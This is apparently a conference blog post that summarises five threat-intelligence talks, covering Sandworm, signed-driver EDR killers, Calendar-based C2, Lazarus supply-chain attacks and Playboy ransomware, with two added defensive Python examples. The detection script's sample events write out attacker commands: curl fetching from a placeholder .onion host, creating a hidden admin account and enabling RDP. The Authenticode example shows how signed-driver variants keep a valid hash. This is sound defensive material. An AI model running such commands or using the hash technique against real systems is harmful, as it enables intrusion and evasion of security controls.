What cybersecurity experts are talking about in 2025

Posted by    on   Jun 10, 2025

The cybersecurity field moves quickly, with new research surfacing regularly and threat actors constantly shifting their approaches. Some discoveries reveal long-running campaigns that have flown under the radar, while others expose novel techniques that challenge conventional thinking about how attacks unfold. We've gathered five recent research topics that caught our attention, each offering a different angle on the current threat landscape and the creative ways both attackers and defenders are adapting.




Cracked by the GRU: how Russia's notorious Sandworm unit weaponizes pirated software usage to target Ukraine

by Arda Büyükkaya (EclecticIQ)

This research presents original threat intelligence on a Russian military intelligence (GRU)-linked cyber espionage and disruption campaign very likely conducted by Sandworm (APT44), which has weaponized Ukraine's widespread use of pirated software. Since late 2023, Sandworm has distributed trojanized Microsoft KMS activators and fake Windows updates through Ukrainian-speaking torrent sites and forums, embedding malware directly into tools commonly used to bypass licensing restrictions. This social engineering strategy enabled precise targeting of economically vulnerable Ukrainian users – spanning civilians, businesses, and potentially government institutions – while evading conventional security controls.

The research details three malware families central to this campaign: BACKORDER, a Go-based loader that disables Windows Defender and deploys Dark Crystal RAT (DcRAT) for espionage and data theft, and Kalambur, a previously unreported backdoor disguised as a Microsoft update. Kalambur is notable for its redundant persistence mechanisms: it establishes a Tor-based reverse shell via curl.exe, enables RDP through hidden admin accounts, and installs an SSH server – all of which allow attackers to retain access even after detection of the Kalambur malware.

The analysis includes a deep technical dive into Kalambur, with attribution to Sandworm based on metadata overlaps in C2 infrastructure and forgotten Russian-language comments in source code.

It also provides actionable IOCs, YARA and Sigma rules, and detailed pivoting methods using VirusTotal and other public tools. The findings offer insight into both the initial and post-compromise tactics of GRU-linked actors, demonstrating how widespread software piracy within a nation can be weaponized as a scalable and low-cost initial access vector.
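The persistence chain described above is the kind of behaviour the report's Sigma rules are meant to catch. As an added illustration (not code from the EclecticIQ report and not its published rules), the following Python script runs simple detection heuristics over constructed process-creation records and correlates them per host: curl.exe reaching a Tor address or local SOCKS port, a new local account added to Administrators and hidden from the logon screen, RDP enablement, and an SSH server install. The record format, host names, the account name, the .onion address, the heuristics and the alert threshold are all assumptions made for this example.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed process-creation records (not telemetry from the report). The
# line format is a simplified key=value shape; WS01/WS02, svc_update and the
# .onion host are placeholders. WS01 shows the chain, WS02 is benign noise.
SAMPLE_EVENTS = r"""
2025-01-15T10:02:11Z host=WS01 user=SYSTEM image=C:\Windows\System32\curl.exe cmdline=curl.exe --socks5-hostname 127.0.0.1:9050 http://placeholder.onion/cmd -o C:\ProgramData\upd.bin
2025-01-15T10:02:40Z host=WS01 user=SYSTEM image=C:\Windows\System32\net.exe cmdline=net user svc_update Placeh0lder! /add
2025-01-15T10:02:41Z host=WS01 user=SYSTEM image=C:\Windows\System32\net.exe cmdline=net localgroup administrators svc_update /add
2025-01-15T10:02:45Z host=WS01 user=SYSTEM image=C:\Windows\System32\reg.exe cmdline=reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v svc_update /t REG_DWORD /d 0 /f
2025-01-15T10:02:50Z host=WS01 user=SYSTEM image=C:\Windows\System32\reg.exe cmdline=reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2025-01-15T10:03:05Z host=WS01 user=SYSTEM image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline=powershell -c Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0
2025-01-15T11:30:00Z host=WS02 user=alice image=C:\Windows\System32\curl.exe cmdline=curl.exe https://www.example.com/report.pdf -o report.pdf
2025-01-15T11:31:00Z host=WS02 user=alice image=C:\Windows\System32\reg.exe cmdline=reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) image=(?P<image>\S+) cmdline=(?P<cmd>.*)$"
)

WINDOW = timedelta(minutes=30)   # assumed correlation window
MIN_TECHNIQUES = 3               # assumed: alert when >= 3 distinct behaviours co-occur


@dataclass(frozen=True)
class Event:
    ts: datetime
    host: str
    user: str
    image: str
    cmd: str


def parse_events(text: str) -> list:
    """Parse the key=value lines into Event records; malformed lines are skipped."""
    events = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append(Event(**d))
    return events


def classify(event: Event) -> list:
    """Return the persistence behaviours a single event matches (assumed heuristics)."""
    cmd = event.cmd.lower()
    image = event.image.lower().rsplit("\\", 1)[-1]
    hits = []
    if image == "curl.exe" and (".onion" in cmd or "127.0.0.1:9050" in cmd):
        hits.append("tor_reverse_shell_via_curl")
    if image == "net.exe" and " user " in cmd and "/add" in cmd:
        hits.append("local_account_created")
    if image == "net.exe" and "localgroup administrators" in cmd and "/add" in cmd:
        hits.append("added_to_administrators")
    if image == "reg.exe" and "specialaccounts\\userlist" in cmd:
        hits.append("account_hidden_from_logon_screen")
    if image == "reg.exe" and "fdenytsconnections" in cmd and "/d 0" in cmd:
        hits.append("rdp_enabled")
    if "openssh.server" in cmd or (image == "sc.exe" and "create" in cmd and "sshd" in cmd):
        hits.append("ssh_server_installed")
    return hits


def correlate(events: list) -> dict:
    """Group hits per host and alert when enough distinct behaviours fall in one window."""
    by_host = defaultdict(list)
    for e in events:
        for technique in classify(e):
            by_host[e.host].append((e.ts, technique))
    alerts = {}
    for host, hits in by_host.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            techniques = {t for ts, t in hits[i:] if ts - t0 <= WINDOW}
            if len(techniques) >= MIN_TECHNIQUES:
                alerts[host] = sorted(techniques)
                break
    return alerts


if __name__ == "__main__":
    for host, techniques in correlate(parse_events(SAMPLE_EVENTS)).items():
        print(f"ALERT {host}: {', '.join(techniques)}")
```

Each single heuristic is noisy on its own (administrators enable RDP legitimately, as WS02 shows); the value comes from correlating several of them on one host within a short window, which is what redundant persistence looks like in telemetry.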


Silent killers: unmasking a large-scale legacy driver exploitation campaign

by Jiří Vinopal (Check Point Research)

What if your trusted security solutions could be silently disarmed without warning? What if a long-forgotten vulnerability in a legitimate driver became the perfect weapon for attackers to bypass defences and strike undetected?

In 2025, Check Point Research uncovered a sophisticated campaign leveraging over 2,500 unique variants of a vulnerable legacy driver to disable EDR and AV solutions. By abusing a loophole in Windows driver signing, the attackers successfully deployed a powerful EDR/AV killer module that bypassed Microsoft's Vulnerable Driver Blocklist and evaded detection mechanisms, including those introduced by the LOLDrivers project.

To ensure stealth, the attackers carefully manipulated the driver's PE structure, generating distinct hashes while preserving its valid signature – a move that allowed thousands of modified variants to remain undetected. Operating from a public cloud's China region, the attackers targeted victims primarily in China and parts of Asia, with devastating precision.

Check Point Research's findings prompted Microsoft to update its Vulnerable Driver Blocklist, neutralizing the exploited driver variants. 
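To make the hash manipulation described above concrete, here is an added Python example (not code from Check Point Research, Microsoft or the LOLDrivers project) that computes a PE file's Authenticode hash over a constructed, non-loadable PE32+ image. Authenticode hashing skips the CheckSum field, the Certificate Table directory entry and the certificate table itself, so two files that differ only in those bytes share one Authenticode hash while their whole-file SHA-256 values differ; a change to a section body alters both. The toy file layout and the "signature" blob are assumptions, and no real signature is verified.

```python
import hashlib
import struct

FILE_ALIGN = 0x200  # FileAlignment used by the constructed image


def build_toy_pe(checksum: int, cert_blob: bytes, code: bytes = b"\xcc" * 16) -> bytes:
    """Assemble a constructed, non-loadable PE32+ file: DOS header, PE/COFF
    headers, one .text section and an attribute certificate table holding
    cert_blob as a stand-in for a real PKCS#7 signature (assumption)."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 60, 64)                   # e_lfanew

    section_data = code.ljust(FILE_ALIGN, b"\x00")
    cert_blob = cert_blob.ljust((len(cert_blob) + 7) & ~7, b"\x00")  # 8-byte aligned
    # WIN_CERTIFICATE header: dwLength, wRevision 0x0200, wCertificateType PKCS#7
    cert_table = struct.pack("<IHH", 8 + len(cert_blob), 0x0200, 0x0002) + cert_blob
    cert_offset = FILE_ALIGN + len(section_data)          # headers | .text | certs

    # COFF header: x64, one section, 240-byte PE32+ optional header
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x2022)

    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                  # PE32+ magic
    struct.pack_into("<I", opt, 32, 0x1000)                # SectionAlignment
    struct.pack_into("<I", opt, 36, FILE_ALIGN)            # FileAlignment
    struct.pack_into("<I", opt, 56, 0x2000)                # SizeOfImage
    struct.pack_into("<I", opt, 60, FILE_ALIGN)            # SizeOfHeaders
    struct.pack_into("<I", opt, 64, checksum)              # CheckSum (not covered by the signature)
    struct.pack_into("<I", opt, 108, 16)                   # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 144, cert_offset, len(cert_table))  # Security directory entry

    section = struct.pack("<8sIIIIIIHHI", b".text", len(section_data), 0x1000,
                          len(section_data), FILE_ALIGN, 0, 0, 0, 0, 0x60000020)

    headers = (dos + b"PE\0\0" + coff + opt + section).ljust(FILE_ALIGN, b"\x00")
    return bytes(headers + section_data + cert_table)


def authenticode_hash(pe: bytes, algo: str = "sha256") -> str:
    """Digest a PE the way Authenticode does: everything except the CheckSum
    field, the Certificate Table directory entry and the certificate table,
    with section bodies taken in PointerToRawData order."""
    h = hashlib.new(algo)
    e_lfanew = struct.unpack_from("<I", pe, 60)[0]
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", pe, opt)[0]
    checksum_off = opt + 64
    secdir_off = opt + (144 if magic == 0x20B else 128)   # PE32+ vs PE32 directory layout
    size_of_headers = struct.unpack_from("<I", pe, opt + 60)[0]
    cert_off, cert_size = struct.unpack_from("<II", pe, secdir_off)

    h.update(pe[:checksum_off])
    h.update(pe[checksum_off + 4:secdir_off])
    h.update(pe[secdir_off + 8:size_of_headers])

    sec_table = opt + opt_size
    sections = [struct.unpack_from("<II", pe, sec_table + i * 40 + 16)  # (SizeOfRawData, PointerToRawData)
                for i in range(num_sections)]
    hashed = size_of_headers
    for raw_size, raw_ptr in sorted(sections, key=lambda s: s[1]):
        h.update(pe[raw_ptr:raw_ptr + raw_size])
        hashed += raw_size
    # Data after the last section is hashed too, except the certificate table.
    extra = len(pe) - hashed - (cert_size if cert_off else 0)
    if extra > 0:
        h.update(pe[hashed:hashed + extra])
    return h.hexdigest()


def compare_variants() -> dict:
    """Two 'variants' that differ only in unsigned bytes share an Authenticode
    hash; a file whose section body changed does not."""
    base = build_toy_pe(0x1111, b"TOY-PKCS7-BLOB" + b"\x00" * 8)
    variant = build_toy_pe(0x2222, b"TOY-PKCS7-BLOB" + b"\x07" * 8)
    tampered = build_toy_pe(0x1111, b"TOY-PKCS7-BLOB" + b"\x00" * 8, code=b"\x90" * 16)

    def file_sha(pe: bytes) -> str:
        return hashlib.sha256(pe).hexdigest()

    return {
        "file_hash_equal": file_sha(base) == file_sha(variant),
        "authenticode_hash_equal": authenticode_hash(base) == authenticode_hash(variant),
        "tampered_section_changes_hash": authenticode_hash(base) != authenticode_hash(tampered),
    }


if __name__ == "__main__":
    print(compare_variants())
```

The practical consequence for defenders: a blocklist or hunting query keyed on the whole-file hash has to chase every variant, whereas one keyed on the Authenticode hash (the value the signature actually vouches for) matches all of them at once. Changing section contents, by contrast, breaks the signature and is a different detection problem.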


Google Calendar as C2 infrastructure: a China-nexus campaign with stealthy tactics

by Tim Chen & Still Hsu (TeamT5)

In recent years, China-nexus threat groups have increasingly adopted tactics to obscure their malware footprint, particularly through the use of LOTS (living off trusted sites) and LOLBins (living off the land binaries and scripts). Recent research by TeamT5 has uncovered a new malware variant named Calendarwalk. This malware employs tactics not previously observed within the APT landscape, including abuse of LOTS via Google Calendar events and exploitation of LOLBins through Windows Workflow Foundation. The report details these techniques and examines a potential link to APT41.

In December 2024, TeamT5 identified two fully undetected (FUD) samples exploiting XOML (Extensible Object Markup Language) in Windows Workflow Foundation (WF) to execute payloads. This is believed to be the first documented case of an APT using this method in the wild. Analysis of the samples revealed two shellcode payloads compressed and encoded using a consistent multi-stage chain. One payload was identified as an AES-encrypted variant of Chatloader (also known as DodgeBox or StealthVector), previously tied to APT41. The other was a previously undocumented malware variant, now named Calendarwalk.

Static analysis of Calendarwalk was initially ineffective due to extensive obfuscation. Through targeted assembly patching, its functionality was confirmed, including a novel command-and-control (C2) mechanism that retrieves and executes commands via Google Calendar events. Similarities were observed with Google Calendar RAT (GCR), an open-source proof-of-concept published on GitHub in 2023, suggesting that Calendarwalk's developer may have drawn inspiration from it.

Further analysis uncovered connections between Calendarwalk and Tabbywalk (also known as CurveBack or MoonWalk), another malware family attributed to APT41. While Calendarwalk utilizes Google Calendar for C2, Tabbywalk uses Google Drive in a comparable role. Both variants also include the same version of Chatloader, reinforcing the attribution link.

This research highlights the evolving tactics used by Chinese APT groups, particularly their increasing reliance on trusted infrastructure and native system components to maintain persistence, evade detection, and reduce forensic visibility.


The Phantom Circuit: the Lazarus Group's evolution in supply chain compromise

by Ryan Sherstobitoff (SecurityScorecard)

In December 2024, a routine software update concealed a global cyber threat. The North Korean state-sponsored Lazarus Group infiltrated trusted development tools, launching a sophisticated supply chain attack code-named Phantom Circuit. The campaign compromised hundreds of victims across the cryptocurrency and technology sectors, using advanced obfuscation techniques and routing infrastructure through proxy servers located in Hasan, Russia.

Analysis by STRIKE revealed a notable shift in Lazarus Group tactics: embedding malware directly into widely used development applications. An extensive command-and-control (C2) infrastructure, operational since September 2024, was used to manage exfiltrated data. The group's administrative platform, concealed behind proxy relays, facilitated persistent access and data management via a hidden React-based interface with Node.js APIs. Further investigation revealed connections between Phantom Circuit and North Korean IT worker schemes, in which state-sponsored actors posing as freelance developers contributed malicious code to software projects.

The research provides a detailed breakdown of Phantom Circuit, including its layered infrastructure, anonymization techniques, and global impact. Key findings include:

  • Infrastructure sophistication: Lazarus employed VPNs and commercial proxy services to obfuscate North Korean IP addresses before routing traffic to C2 servers.
  • Targeted sectors: Over 1,500 developers globally – primarily in the technology and cryptocurrency industries – were compromised.
  • Data exfiltration: Stolen credentials, authentication tokens, and system configurations were systematically organized and stored in Dropbox for later use.
  • Operational evolution: The use of modern frameworks such as React and Node.js to manage stolen data illustrates the group's growing technical adaptability.

The investigation relied on a combination of OSINT, netflow telemetry, and STRIKE threat intelligence feeds. North Korean IP addresses were observed originating traffic to Astrill VPN endpoints, which were then relayed through the Oculus Proxy network, registered to Sky Freight Limited in Hasan, Russia, before reaching Lazarus-controlled C2 infrastructure. These endpoints showed overlap with past cyber operations attributed to the Lazarus Group, further confirming attribution. Additional links were found between Phantom Circuit and North Korea's IT worker campaigns, where operatives injected malicious code into global development environments under the guise of freelance contributors.

The findings underscore the increasing complexity of state-sponsored cyber operations and the urgent need for robust supply chain security. Insights drawn from Phantom Circuit highlight the importance of monitoring development environments, verifying software dependencies, and applying advanced threat intelligence to defend against such attacks.


Demystifying the Playboy RaaS

by Gijs Rijnders (Dutch National Police)

In recent years, ransomware has become one of the most prolific forms of cybercrime, with financial gain as the primary motive. The problem keeps getting bigger, with a new operation seeing the light almost every month. The Dutch National Police is often a key player in large-scale ransomware investigations. Operation Cronos is a prime example, where law enforcement took down infrastructure of the infamous LockBit group in 2024.

Today, many ransomware groups operate RaaS (ransomware-as-a-service) models. They provide the ransomware and a platform to extort victims as a service, and affiliated hacker groups carry out the actual attacks. The platform is often run from a VPS (virtual private server), and sometimes, this server is in the Netherlands. Dutch law enforcement seizes those servers and extracts their content for investigation. This happened to the Playboy ransomware in late 2024.

A chain of various tools is used to provide a ready-to-use ransomware package to affiliates of a RaaS program. Several modern ransomware operations even support CPU architectures and operating systems other than x86-64 and Windows. New cryptographic keys are generated for every victim, ransomware parameters are configured, and a builder creates the final package to be used by the affiliate. The investigation details how the Playboy ransomware servers were seized, examines the toolchain involved, and analyses how executables were prepared for deployment by affiliates.


All five of these topics will be presented live at VB2025 this September in Berlin, as part of a much broader programme featuring dozens of in-depth talks from across the threat intelligence community.
